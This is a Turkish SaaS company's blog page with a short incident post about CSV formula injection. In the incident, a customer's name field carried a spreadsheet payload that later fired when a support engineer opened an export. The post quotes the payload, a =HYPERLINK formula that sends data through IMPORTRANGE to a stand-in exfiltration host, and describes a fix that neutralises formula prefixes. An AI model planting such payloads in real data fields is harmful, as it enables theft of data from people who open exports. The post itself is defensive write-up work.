İçeriğe atla
ÖzelliklerFiyatlandırmaİş OrtaklığıBlogYardımHakkımızdaİletişim
BaşlaGiriş Yap
Bloga Dön
industry2026-05-236 dk okuma

Müşteri adına =HYPERLINK yazınca: Diamond tier kullanıcı, destek mühendisinin Excel'ini nasıl RCE etti — CSV formula injection vakası

Stuttgart'ta finans operasyon mühendisi Markus Pazartesi sabahı SaaS müşteri export'unu açtı; tarayıcısı yarım saniye bilinmeyen alana açıldı, BT alarmı: "outbound blocked." Konya'dan Bilge'nin Supabase full_name alanına yazdığı =HYPERLINK("http://exfil.example?d="&IMPORTRANGE(...), "Bilge") payload'ı CSV'de uyuyordu. PR #365 + #590 batch YY: shared csvField() ile formula-prefix nötrleştirme.

th

thMenu Ekibi

thmenu.com

Faydalı buldunuz mu? Paylaşın.

İlgili makaleler

🔻
industry

Müşteri Aboneliğini Düşürünce Eski Özellikler Ne Olur? — SaaS Sessiz Feature-Drift Problemi

Çoğu SaaS abonelik tier’ı düştüğünde tek satır kod çalıştırır ama eski özellikle

🛡️
industry

JWT alg-confusion atağı — Supabase HS256'dan RS256/JWKS'e geçince eski verifier'lar neden yıkılır?

JWT header'ı decode etmeyen verifier'lar `alg=none` ve `alg-confusion` saldırıla

📒
industry

Her bakiye değişikliğinin neden bir 'journal row'u olmalı? — SaaS finansal audit'in temel taşı

SaaS bakiyeleri tek satır UPDATE ile yönetince "drift var ama HANGİ mutasyon yan